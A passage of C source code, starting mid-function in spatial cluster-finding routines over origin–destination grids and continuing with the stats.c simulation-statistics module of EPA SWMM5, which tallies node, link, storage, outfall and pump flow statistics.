int cY1 = temp / nCol;
double lastX1 = xMin + cellSize * cX1;
double lastY1 = yMin + cellSize * cY1;
double lastX2 = xMin + cellSize * cX2;
double lastY2 = yMin + cellSize * cY2;
double lastRad = (aRadius + 1) * wSize;
double distanceO, distanceD;
int maxWindow;
double thisX1, thisY1, thisX2, thisY2;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < totalCenters; i++) {
cX2 = i % nCol;
temp = i / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
thisX1 = xMin + cellSize * cX1;
thisY1 = yMin + cellSize * cY1;
thisX2 = xMin + cellSize * cX2;
thisY2 = yMin + cellSize * cY2;
distanceO = sqrt((thisX1 - lastX1) * (thisX1 - lastX1) + (thisY1 - lastY1) * (thisY1 - lastY1)) - lastRad;
distanceD = sqrt((thisX2 - lastX2) * (thisX2 - lastX2) + (thisY2 - lastY2) * (thisY2 - lastY2)) - lastRad;
if(distanceO > distanceD) {
maxWindow = ceil(distanceO / wSize) - 1;
}
else {
maxWindow = ceil(distanceD / wSize) - 1;
}
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secoundary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
cX2 = aCenter % nCol;
temp = aCenter / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
lastX1 = xMin + cellSize * cX1;
lastY1 = yMin + cellSize * cY1;
lastX2 = xMin + cellSize * cX2;
lastY2 = yMin + cellSize * cY2;
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster2DDiff(double * x1, double * y1, double * x2, double * y2, int locCount, double * ll, double wSize, int wCount, int * center, int * radiusO, int * radiusD, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int aCenter = -1;
int aRadiusO = -1;
int aRadiusD = -1;
int windowPerCen = wCount * wCount;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[0] = aCenter;
radiusO[0] = aRadiusO;
radiusD[0] = aRadiusD;
cLL[0] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
double lastX1, lastY1, lastX2, lastY2, lastRadO, lastRadD;
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRadO = (aRadiusO + 1) * wSize;
lastRadD = (aRadiusD + 1) * wSize;
double distanceO, distanceD;
int maxWindowO, maxWindowD;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < locCount; i++) {
distanceO = sqrt((x1[i] - lastX1) * (x1[i] - lastX1) + (y1[i] - lastY1) * (y1[i] - lastY1)) - lastRadO;
distanceD = sqrt((x2[i] - lastX2) * (x2[i] - lastX2) + (y2[i] - lastY2) * (y2[i] - lastY2)) - lastRadD;
maxWindowO = ceil(distanceO / wSize) - 1;
maxWindowD = ceil(distanceD / wSize) - 1;
if(maxWindowO < 0)
maxWindowO = 0;
if(maxWindowD < 0)
maxWindowD = 0;
for(int j = maxWindowO; j < wCount; j++) {
for(int k = maxWindowD; k < wCount; k++) {
ll[i * windowPerCen + j * wCount + k] = 1;
}
}
}
//Find secoundary clusters
aCenter = -1;
aRadiusO = -1;
aRadiusD = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[c] = aCenter;
radiusO[c] = aRadiusO;
radiusD[c] = aRadiusD;
if(aCenter != -1) {
cLL[c] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
}
else {
break;
}
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRadO = (aRadiusO + 1) * wSize;
lastRadD = (aRadiusD + 1) * wSize;
}
return;
}
void findTopNCluster2DDiff(double xMin, double yMin, double cellSize, int nRow, int nCol, double * ll, double wSize, int wCount, int * center, int * radiusO, int * radiusD, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int totalCenters = nRow * nRow * nCol * nCol;
int windowPerCen = wCount * wCount;
int aCenter = -1;
int aRadiusO = -1;
int aRadiusD = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[0] = aCenter;
radiusO[0] = aRadiusO;
radiusD[0] = aRadiusD;
cLL[0] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
int temp;
int cX2 = aCenter % nCol;
temp = aCenter / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double lastX1 = xMin + cellSize * cX1;
double lastY1 = yMin + cellSize * cY1;
double lastX2 = xMin + cellSize * cX2;
double lastY2 = yMin + cellSize * cY2;
double lastRadO = (aRadiusO + 1) * wSize;
double lastRadD = (aRadiusD + 1) * wSize;
double distanceO, distanceD;
int maxWindowO, maxWindowD;;
double thisX1, thisY1, thisX2, thisY2;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < totalCenters; i++) {
cX2 = i % nCol;
temp = i / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
thisX1 = xMin + cellSize * cX1;
thisY1 = yMin + cellSize * cY1;
thisX2 = xMin + cellSize * cX2;
thisY2 = yMin + cellSize * cY2;
distanceO = sqrt((thisX1 - lastX1) * (thisX1 - lastX1) + (thisY1 - lastY1) * (thisY1 - lastY1)) - lastRadO;
distanceD = sqrt((thisX2 - lastX2) * (thisX2 - lastX2) + (thisY2 - lastY2) * (thisY2 - lastY2)) - lastRadD;
maxWindowO = ceil(distanceO / wSize) - 1;
maxWindowD = ceil(distanceD / wSize) - 1;
if(maxWindowO < 0)
maxWindowO = 0;
if(maxWindowD < 0)
maxWindowD = 0;
for(int j = maxWindowO; j < wCount; j++) {
for(int k = maxWindowD; k < wCount; k++) {
ll[i * windowPerCen + j * wCount + k] = 1;
}
}
}
//Find secoundary clusters
aCenter = -1;
aRadiusO = -1;
aRadiusD = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
for(int k = 0; k < wCount; k++) {
if(ll[i * windowPerCen + j * wCount + k] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
else if(ll[i * windowPerCen + j * wCount + k] > ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD]) {
aCenter = i;
aRadiusO = j;
aRadiusD = k;
}
}
}
}
}
center[c] = aCenter;
radiusO[c] = aRadiusO;
radiusD[c] = aRadiusD;
if(aCenter != -1) {
cLL[c] = ll[aCenter * windowPerCen + aRadiusO * wCount + aRadiusD];
}
else {
break;
}
cX2 = aCenter % nCol;
temp = aCenter / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
lastX1 = xMin + cellSize * cX1;
lastY1 = yMin + cellSize * cY1;
lastX2 = xMin + cellSize * cX2;
lastY2 = yMin + cellSize * cY2;
lastRadO = (aRadiusO + 1) * wSize;
lastRadD = (aRadiusD + 1) * wSize;
}
return;
}
|
stats.c | //-----------------------------------------------------------------------------
// stats.c
//
// Project: EPA SWMM5
// Version: 5.1
// Date: 03/20/14 (Build 5.1.001)
// 09/15/14 (Build 5.1.007)
// 03/19/15 (Build 5.1.008)
// 08/01/16 (Build 5.1.011)
// 03/14/17 (Build 5.1.012)
// Author: L. Rossman (EPA)
// R. Dickinson (CDM)
//
// Simulation statistics functions.
//
// Build 5.1.007:
// - Exfiltration losses added to storage node statistics.
//
// Build 5.1.008:
// - Support for updating groundwater statistics added.
// - Support for updating maximum reported nodal depths added.
// - OpenMP parallelization applied to updating node and link flow statistics.
// - Updating of time that conduit is upstrm/dnstrm full was modified.
//
// Build 5.1.011:
// - Surcharging is now evaluated only under dynamic wave flow routing and
// storage nodes cannot be classified as surcharged.
//
// Build 5.1.012:
// - Time step statistics now evaluated only in non-steady state periods.
// - Check for full conduit flow now accounts for number of barrels.
//
//-----------------------------------------------------------------------------
#define _CRT_SECURE_NO_DEPRECATE
#include <stdlib.h>
#include <string.h>
#include <math.h>
#if defined(_OPENMP)
#include <omp.h> //(5.1.008)
#endif
#include "headers.h"
#include "swmm5.h"
//-----------------------------------------------------------------------------
// Shared variables
//-----------------------------------------------------------------------------
#define MAX_STATS 5
static TSysStats SysStats;
static TMaxStats MaxMassBalErrs[MAX_STATS];
static TMaxStats MaxCourantCrit[MAX_STATS];
static TMaxStats MaxFlowTurns[MAX_STATS];
static double SysOutfallFlow;
//-----------------------------------------------------------------------------
// Exportable variables (shared with statsrpt.c)
//-----------------------------------------------------------------------------
TSubcatchStats* SubcatchStats;
TNodeStats* NodeStats;
TLinkStats* LinkStats;
TStorageStats* StorageStats;
TOutfallStats* OutfallStats;
TPumpStats* PumpStats;
double MaxOutfallFlow;
double MaxRunoffFlow;
//-----------------------------------------------------------------------------
// Imported variables
//-----------------------------------------------------------------------------
extern double* NodeInflow; // defined in massbal.c
extern double* NodeOutflow; // defined in massbal.c
//-----------------------------------------------------------------------------
// External functions (declared in funcs.h)
//-----------------------------------------------------------------------------
// stats_open (called from swmm_start in swmm5.c)
// stats_close (called from swmm_end in swmm5.c)
// stats_report (called from swmm_end in swmm5.c)
// stats_updateSubcatchStats (called from subcatch_getRunoff)
// stats_updateGwaterStats (called from gwater_getGroundwater) //(5.1.008)
// stats_updateFlowStats (called from routing_execute)
// stats_updateCriticalTimeCount (called from getVariableStep in dynwave.c)
// stats_updateMaxNodeDepth (called from output_saveNodeResults) //(5.1.008)
//-----------------------------------------------------------------------------
// Local functions
//-----------------------------------------------------------------------------
static void stats_updateNodeStats(int node, double tStep, DateTime aDate);
static void stats_updateLinkStats(int link, double tStep, DateTime aDate);
static void stats_findMaxStats(void);
static void stats_updateMaxStats(TMaxStats maxStats[], int i, int j, double x);
//=============================================================================
int stats_open()
//
// Input: none
// Output: returns an error code
// Purpose: opens the simulation statistics system.
//
{
int j, k;
// --- set all pointers to NULL
NodeStats = NULL;
LinkStats = NULL;
StorageStats = NULL;
OutfallStats = NULL;
PumpStats = NULL;
// --- allocate memory for & initialize subcatchment statistics
SubcatchStats = NULL;
if ( Nobjects[SUBCATCH] > 0 )
{
SubcatchStats = (TSubcatchStats *) calloc(Nobjects[SUBCATCH],
sizeof(TSubcatchStats));
if ( !SubcatchStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
for (j=0; j<Nobjects[SUBCATCH]; j++)
{
SubcatchStats[j].precip = 0.0;
SubcatchStats[j].runon = 0.0;
SubcatchStats[j].evap = 0.0;
SubcatchStats[j].infil = 0.0;
SubcatchStats[j].runoff = 0.0;
SubcatchStats[j].maxFlow = 0.0;
}
//// Added to release 5.1.008. //// //(5.1.008)
////
for (j=0; j<Nobjects[SUBCATCH]; j++)
{
if ( Subcatch[j].groundwater == NULL ) continue;
Subcatch[j].groundwater->stats.avgUpperMoist = 0.0;
Subcatch[j].groundwater->stats.avgWaterTable = 0.0;
Subcatch[j].groundwater->stats.infil = 0.0;
Subcatch[j].groundwater->stats.latFlow = 0.0;
Subcatch[j].groundwater->stats.deepFlow = 0.0;
Subcatch[j].groundwater->stats.evap = 0.0;
Subcatch[j].groundwater->stats.maxFlow = 0.0;
}
////
}
// --- allocate memory for node & link stats
if ( Nobjects[LINK] > 0 )
{
NodeStats = (TNodeStats *) calloc(Nobjects[NODE], sizeof(TNodeStats));
LinkStats = (TLinkStats *) calloc(Nobjects[LINK], sizeof(TLinkStats));
if ( !NodeStats || !LinkStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
}
// --- initialize node stats
if ( NodeStats ) for ( j = 0; j < Nobjects[NODE]; j++ )
{
NodeStats[j].avgDepth = 0.0;
NodeStats[j].maxDepth = 0.0;
NodeStats[j].maxDepthDate = StartDateTime;
NodeStats[j].maxRptDepth = 0.0; //(5.1.008)
NodeStats[j].volFlooded = 0.0;
NodeStats[j].timeFlooded = 0.0;
NodeStats[j].timeSurcharged = 0.0;
NodeStats[j].timeCourantCritical = 0.0;
NodeStats[j].totLatFlow = 0.0;
NodeStats[j].maxLatFlow = 0.0;
NodeStats[j].maxInflow = 0.0;
NodeStats[j].maxOverflow = 0.0;
NodeStats[j].maxPondedVol = 0.0;
NodeStats[j].maxInflowDate = StartDateTime;
NodeStats[j].maxOverflowDate = StartDateTime;
}
// --- initialize link stats
if ( LinkStats ) for ( j = 0; j < Nobjects[LINK]; j++ )
{
LinkStats[j].maxFlow = 0.0;
LinkStats[j].maxVeloc = 0.0;
LinkStats[j].maxDepth = 0.0;
LinkStats[j].timeSurcharged = 0.0;
LinkStats[j].timeFullUpstream = 0.0;
LinkStats[j].timeFullDnstream = 0.0;
LinkStats[j].timeFullFlow = 0.0;
LinkStats[j].timeCapacityLimited = 0.0;
LinkStats[j].timeCourantCritical = 0.0;
for (k=0; k<MAX_FLOW_CLASSES; k++)
LinkStats[j].timeInFlowClass[k] = 0.0;
LinkStats[j].flowTurns = 0;
LinkStats[j].flowTurnSign = 0;
}
// --- allocate memory for & initialize storage unit statistics
if ( Nnodes[STORAGE] > 0 )
{
StorageStats = (TStorageStats *) calloc(Nnodes[STORAGE],
sizeof(TStorageStats));
if ( !StorageStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
else for ( k = 0; k < Nobjects[NODE]; k++ )
{
if ( Node[k].type != STORAGE ) continue;
j = Node[k].subIndex;
StorageStats[j].initVol = Node[k].newVolume;
StorageStats[j].avgVol = 0.0;
StorageStats[j].maxVol = 0.0;
StorageStats[j].maxFlow = 0.0;
StorageStats[j].evapLosses = 0.0;
StorageStats[j].exfilLosses = 0.0; //(5.1.007)
StorageStats[j].maxVolDate = StartDateTime;
}
}
// --- allocate memory for & initialize outfall statistics
if ( Nnodes[OUTFALL] > 0 )
{
OutfallStats = (TOutfallStats *) calloc(Nnodes[OUTFALL],
sizeof(TOutfallStats));
if ( !OutfallStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
else for ( j = 0; j < Nnodes[OUTFALL]; j++ )
{
OutfallStats[j].avgFlow = 0.0;
OutfallStats[j].maxFlow = 0.0;
OutfallStats[j].totalPeriods = 0;
if ( Nobjects[POLLUT] > 0 )
{
OutfallStats[j].totalLoad =
(double *) calloc(Nobjects[POLLUT], sizeof(double));
if ( !OutfallStats[j].totalLoad )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
for (k=0; k<Nobjects[POLLUT]; k++)
OutfallStats[j].totalLoad[k] = 0.0;
}
else OutfallStats[j].totalLoad = NULL;
}
}
// --- allocate memory & initialize pumping statistics
if ( Nlinks[PUMP] > 0 )
{
PumpStats = (TPumpStats *) calloc(Nlinks[PUMP], sizeof(TPumpStats));
if ( !PumpStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
else for ( j = 0; j < Nlinks[PUMP]; j++ )
{
PumpStats[j].utilized = 0.0;
PumpStats[j].minFlow = 0.0;
PumpStats[j].avgFlow = 0.0;
PumpStats[j].maxFlow = 0.0;
PumpStats[j].volume = 0.0;
PumpStats[j].energy = 0.0;
PumpStats[j].startUps = 0;
PumpStats[j].offCurveLow = 0.0;
PumpStats[j].offCurveHigh = 0.0;
}
}
// --- initialize system stats
MaxRunoffFlow = 0.0;
MaxOutfallFlow = 0.0;
SysStats.maxTimeStep = 0.0;
SysStats.minTimeStep = RouteStep;
SysStats.avgTimeStep = 0.0;
SysStats.avgStepCount = 0.0;
SysStats.steadyStateCount = 0.0;
return 0;
}
//=============================================================================
void stats_close()
//
// Input: none
// Output:
// Purpose: closes the simulation statistics system.
//
{
int j;
FREE(SubcatchStats);
FREE(NodeStats);
FREE(LinkStats);
FREE(StorageStats);
if ( OutfallStats )
{
for ( j=0; j<Nnodes[OUTFALL]; j++ )
FREE(OutfallStats[j].totalLoad);
FREE(OutfallStats);
}
FREE(PumpStats);
}
//=============================================================================
void stats_report()
//
// Input: none
// Output: none
// Purpose: reports simulation statistics.
//
{
// --- report flow routing accuracy statistics
if ( Nobjects[LINK] > 0 && RouteModel != NO_ROUTING )
{
stats_findMaxStats();
report_writeMaxStats(MaxMassBalErrs, MaxCourantCrit, MAX_STATS);
report_writeMaxFlowTurns(MaxFlowTurns, MAX_STATS);
report_writeSysStats(&SysStats);
}
// --- report summary statistics
statsrpt_writeReport();
}
//=============================================================================
void stats_updateSubcatchStats(int j, double rainVol, double runonVol,
double evapVol, double infilVol,
double runoffVol, double runoff)
//
// Input: j = subcatchment index
// rainVol = rainfall + snowfall volume (ft3)
// runonVol = runon volume from other subcatchments (ft3)
// evapVol = evaporation volume (ft3)
// infilVol = infiltration volume (ft3)
// runoffVol = runoff volume (ft3)
// runoff = runoff rate (cfs)
// Output: none
// Purpose: updates totals of runoff components for a specific subcatchment.
//
{
int p;
SubcatchStats[j].precip += rainVol;
SubcatchStats[j].runon += runonVol;
SubcatchStats[j].evap += evapVol;
SubcatchStats[j].infil += infilVol;
SubcatchStats[j].runoff += runoffVol;
SubcatchStats[j].maxFlow = MAX(SubcatchStats[j].maxFlow, runoff);
}
//=============================================================================
//// New function added to release 5.1.008. //// //(5.1.008)
void stats_updateGwaterStats(int j, double infil, double evap, double latFlow,
double deepFlow, double theta, double waterTable,
double tStep)
{
Subcatch[j].groundwater->stats.infil += infil * tStep;
Subcatch[j].groundwater->stats.evap += evap * tStep;
Subcatch[j].groundwater->stats.latFlow += latFlow * tStep;
Subcatch[j].groundwater->stats.deepFlow += deepFlow * tStep;
Subcatch[j].groundwater->stats.avgUpperMoist += theta * tStep;
Subcatch[j].groundwater->stats.avgWaterTable += waterTable * tStep;
Subcatch[j].groundwater->stats.finalUpperMoist = theta;
Subcatch[j].groundwater->stats.finalWaterTable = waterTable;
if ( fabs(latFlow) > fabs(Subcatch[j].groundwater->stats.maxFlow) )
{
Subcatch[j].groundwater->stats.maxFlow = latFlow;
}
}
//=============================================================================
void stats_updateMaxRunoff()
//
// Input: none
// Output: updates global variable MaxRunoffFlow
// Purpose: updates value of maximum system runoff rate.
//
{
int j;
double sysRunoff = 0.0;
for (j=0; j<Nobjects[SUBCATCH]; j++) sysRunoff += Subcatch[j].newRunoff;
MaxRunoffFlow = MAX(MaxRunoffFlow, sysRunoff);
}
//=============================================================================
//// New function added for release 5.1.008. //// //(5.1.008)
void stats_updateMaxNodeDepth(int j, double depth)
//
// Input: j = node index
// depth = water depth at node at current reporting time (ft)
// Output: none
// Purpose: updates a node's maximum depth recorded at reporting times.
//
{
if ( NodeStats != NULL )
NodeStats[j].maxRptDepth = MAX(NodeStats[j].maxRptDepth, depth);
}
//=============================================================================
void stats_updateFlowStats(double tStep, DateTime aDate, int stepCount,
int steadyState)
//
// Input: tStep = routing time step (sec)
// aDate = current date/time
// stepCount = # steps required to solve routing at current time period
// steadyState = TRUE if steady flow conditions exist
// Output: none
// Purpose: updates various flow routing statistics at current time period.
//
{
int j;
// --- update stats only after reporting period begins
if ( aDate < ReportStart ) return;
SysOutfallFlow = 0.0;
// --- update node & link stats
#pragma omp parallel num_threads(NumThreads) //(5.1.008)
{
#pragma omp for //(5.1.008)
for ( j=0; j<Nobjects[NODE]; j++ )
stats_updateNodeStats(j, tStep, aDate);
#pragma omp for //(5.1.008)
for ( j=0; j<Nobjects[LINK]; j++ )
stats_updateLinkStats(j, tStep, aDate);
}
//// Following code segment modified for release 5.1.012. //// //(5.1.012)
// --- update count of times in steady state
SysStats.steadyStateCount += steadyState;
// --- update time step stats if not in steady state
if ( steadyState == FALSE )
{
// --- skip initial time step for min. value)
if ( OldRoutingTime > 0 )
{
SysStats.minTimeStep = MIN(SysStats.minTimeStep, tStep);
}
SysStats.avgTimeStep += tStep;
SysStats.maxTimeStep = MAX(SysStats.maxTimeStep, tStep);
// --- update iteration step count stats
SysStats.avgStepCount += stepCount;
}
////
// --- update max. system outfall flow
MaxOutfallFlow = MAX(MaxOutfallFlow, SysOutfallFlow);
}
//=============================================================================
void stats_updateCriticalTimeCount(int node, int link)
//
// Input: node = node index
// link = link index
// Output: none
// Purpose: updates count of times a node or link was time step-critical.
//
{
if ( node >= 0 ) NodeStats[node].timeCourantCritical += 1.0;
else if ( link >= 0 ) LinkStats[link].timeCourantCritical += 1.0;
}
//=============================================================================
//// Function modified for release 5.1.008. //// //(5.1.008)
void stats_updateNodeStats(int j, double tStep, DateTime aDate)
//
// Input: j = node index
// tStep = routing time step (sec)
// aDate = current date/time
// Output: none
// Purpose: updates flow statistics for a node.
//
{
int k, p;
double newVolume = Node[j].newVolume;
double newDepth = Node[j].newDepth;
int canPond = (AllowPonding && Node[j].pondedArea > 0.0);
// --- update depth statistics
NodeStats[j].avgDepth += newDepth;
if ( newDepth > NodeStats[j].maxDepth )
{
NodeStats[j].maxDepth = newDepth;
NodeStats[j].maxDepthDate = aDate;
}
// --- update flooding, ponding, and surcharge statistics
if ( Node[j].type != OUTFALL )
{
if ( newVolume > Node[j].fullVolume || Node[j].overflow > 0.0 )
{
NodeStats[j].timeFlooded += tStep;
NodeStats[j].volFlooded += Node[j].overflow * tStep;
if ( canPond ) NodeStats[j].maxPondedVol =
MAX(NodeStats[j].maxPondedVol,
(newVolume - Node[j].fullVolume));
}
// --- for dynamic wave routing, classify a non-storage node as //(5.1.011)
// surcharged if its water level exceeds its crown elev. //(5.1.011)
if ( RouteModel == DW && Node[j].type != STORAGE && //(5.1.011)
newDepth + Node[j].invertElev + FUDGE >= Node[j].crownElev )
{
NodeStats[j].timeSurcharged += tStep;
}
}
// --- update storage statistics
if ( Node[j].type == STORAGE )
{
k = Node[j].subIndex;
StorageStats[k].avgVol += newVolume;
StorageStats[k].evapLosses +=
Storage[Node[j].subIndex].evapLoss;
StorageStats[k].exfilLosses +=
Storage[Node[j].subIndex].exfilLoss;
newVolume = MIN(newVolume, Node[j].fullVolume);
if ( newVolume > StorageStats[k].maxVol )
{
StorageStats[k].maxVol = newVolume;
StorageStats[k].maxVolDate = aDate;
}
StorageStats[k].maxFlow = MAX(StorageStats[k].maxFlow, Node[j].outflow);
}
// --- update outfall statistics
if ( Node[j].type == OUTFALL )
{
k = Node[j].subIndex;
if ( Node[j].inflow >= MIN_RUNOFF_FLOW )
{
OutfallStats[k].avgFlow += Node[j].inflow;
OutfallStats[k].maxFlow = MAX(OutfallStats[k].maxFlow, Node[j].inflow);
OutfallStats[k].totalPeriods++;
}
for (p=0; p<Nobjects[POLLUT]; p++)
{
OutfallStats[k].totalLoad[p] += Node[j].inflow *
Node[j].newQual[p] * tStep;
}
SysOutfallFlow += Node[j].inflow;
}
// --- update inflow statistics
NodeStats[j].totLatFlow += ( (Node[j].oldLatFlow + Node[j].newLatFlow) *
0.5 * tStep );
if ( fabs(Node[j].newLatFlow) > fabs(NodeStats[j].maxLatFlow) )
NodeStats[j].maxLatFlow = Node[j].newLatFlow;
if ( Node[j].inflow > NodeStats[j].maxInflow )
{
NodeStats[j].maxInflow = Node[j].inflow;
NodeStats[j].maxInflowDate = aDate;
}
// --- update overflow statistics
if ( Node[j].overflow > NodeStats[j].maxOverflow )
{
NodeStats[j].maxOverflow = Node[j].overflow;
NodeStats[j].maxOverflowDate = aDate;
}
}
//=============================================================================
void stats_updateLinkStats(int j, double tStep, DateTime aDate)
//
// Input: j = link index
// tStep = routing time step (sec)
// aDate = current date/time
// Output: none
// Purpose: updates flow statistics for a link.
//
{
int k;
double q, v;
double dq;
// --- update max. flow
dq = Link[j].newFlow - Link[j].oldFlow;
q = fabs(Link[j].newFlow);
if ( q > LinkStats[j].maxFlow )
{
LinkStats[j].maxFlow = q;
LinkStats[j].maxFlowDate = aDate;
}
// --- update max. velocity
v = link_getVelocity(j, q, Link[j].newDepth);
if ( v > LinkStats[j].maxVeloc )
{
LinkStats[j].maxVeloc = v;
//LinkStats[j].maxVelocDate = aDate; //(5.1.008)
}
// --- update max. depth
if ( Link[j].newDepth > LinkStats[j].maxDepth )
{
LinkStats[j].maxDepth = Link[j].newDepth;
}
if ( Link[j].type == PUMP )
{
if ( q >= Link[j].qFull )
LinkStats[j].timeFullFlow += tStep;
if ( q > MIN_RUNOFF_FLOW )
{
k = Link[j].subIndex;
PumpStats[k].minFlow = MIN(PumpStats[k].minFlow, q);
PumpStats[k].maxFlow = LinkStats[j].maxFlow;
PumpStats[k].avgFlow += q;
PumpStats[k].volume += q*tStep;
PumpStats[k].utilized += tStep;
PumpStats[k].energy += link_getPower(j)*tStep/3600.0;
if ( Link[j].flowClass == DN_DRY )
PumpStats[k].offCurveLow += tStep;
if ( Link[j].flowClass == UP_DRY )
PumpStats[k].offCurveHigh += tStep;
if ( Link[j].oldFlow < MIN_RUNOFF_FLOW )
PumpStats[k].startUps++;
PumpStats[k].totalPeriods++;
LinkStats[j].timeSurcharged += tStep;
LinkStats[j].timeFullUpstream += tStep;
LinkStats[j].timeFullDnstream += tStep;
}
}
else if ( Link[j].type == CONDUIT )
{
// --- update time under normal flow & inlet control
if ( Link[j].normalFlow ) LinkStats[j].timeNormalFlow += tStep;
if ( Link[j].inletControl ) LinkStats[j].timeInletControl += tStep;
// --- update flow classification distribution
k = Link[j].flowClass;
if ( k >= 0 && k < MAX_FLOW_CLASSES )
{
++LinkStats[j].timeInFlowClass[k];
}
// --- update time conduit is full
k = Link[j].subIndex;
if ( q >= Link[j].qFull * (double)Conduit[k].barrels ) //(5.1.012)
LinkStats[j].timeFullFlow += tStep;
if ( Conduit[k].capacityLimited )
LinkStats[j].timeCapacityLimited += tStep;
//// Following section modified for release 5.1.008. //// //(5.1.008)
////
switch (Conduit[k].fullState)
{
case ALL_FULL:
LinkStats[j].timeSurcharged += tStep;
LinkStats[j].timeFullUpstream += tStep;
LinkStats[j].timeFullDnstream += tStep;
break;
case UP_FULL:
LinkStats[j].timeFullUpstream += tStep;
break;
case DN_FULL:
LinkStats[j].timeFullDnstream += tStep;
}
////
}
// --- update flow turn count
k = LinkStats[j].flowTurnSign;
LinkStats[j].flowTurnSign = SGN(dq);
if ( fabs(dq) > 0.001 && k * LinkStats[j].flowTurnSign < 0 )
LinkStats[j].flowTurns++;
}
//=============================================================================
void stats_findMaxStats()
//
// Input: none
// Output: none
// Purpose: finds nodes & links with highest mass balance errors
// & highest times Courant time-step critical.
//
{
int j;
double x;
// --- initialize max. stats arrays
for (j=0; j<MAX_STATS; j++)
{
MaxMassBalErrs[j].objType = NODE;
MaxMassBalErrs[j].index = -1;
MaxMassBalErrs[j].value = -1.0;
MaxCourantCrit[j].index = -1;
MaxCourantCrit[j].value = -1.0;
MaxFlowTurns[j].index = -1;
MaxFlowTurns[j].value = -1.0;
}
// --- find links with most flow turns
if ( StepCount > 2 )
{
for (j=0; j<Nobjects[LINK]; j++)
{
x = 100.0 * LinkStats[j].flowTurns / (2./3.*(StepCount-2));
stats_updateMaxStats(MaxFlowTurns, LINK, j, x);
}
}
// --- find nodes with largest mass balance errors
for (j=0; j<Nobjects[NODE]; j++)
{
// --- skip terminal nodes and nodes with negligible inflow
if ( Node[j].degree <= 0 ) continue;
if ( NodeInflow[j] <= 0.1 ) continue;
// --- evaluate mass balance error
// (Note: NodeInflow & NodeOutflow include any initial and final
// stored volumes, respectively).
if ( NodeInflow[j] > 0.0 )
x = 1.0 - NodeOutflow[j] / NodeInflow[j];
else if ( NodeOutflow[j] > 0.0 ) x = -1.0;
else x = 0.0;
stats_updateMaxStats(MaxMassBalErrs, NODE, j, 100.0*x);
}
// --- stop if not using a variable time step
if ( RouteModel != DW || CourantFactor == 0.0 ) return;
// --- find nodes most frequently Courant critical
if ( StepCount == 0 ) return; //(5.1.008)
for (j=0; j<Nobjects[NODE]; j++)
{
x = NodeStats[j].timeCourantCritical / StepCount;
stats_updateMaxStats(MaxCourantCrit, NODE, j, 100.0*x);
}
// --- find links most frequently Courant critical
for (j=0; j<Nobjects[LINK]; j++)
{
x = LinkStats[j].timeCourantCritical / StepCount;
stats_updateMaxStats(MaxCourantCrit, LINK, j, 100.0*x);
}
}
//=============================================================================
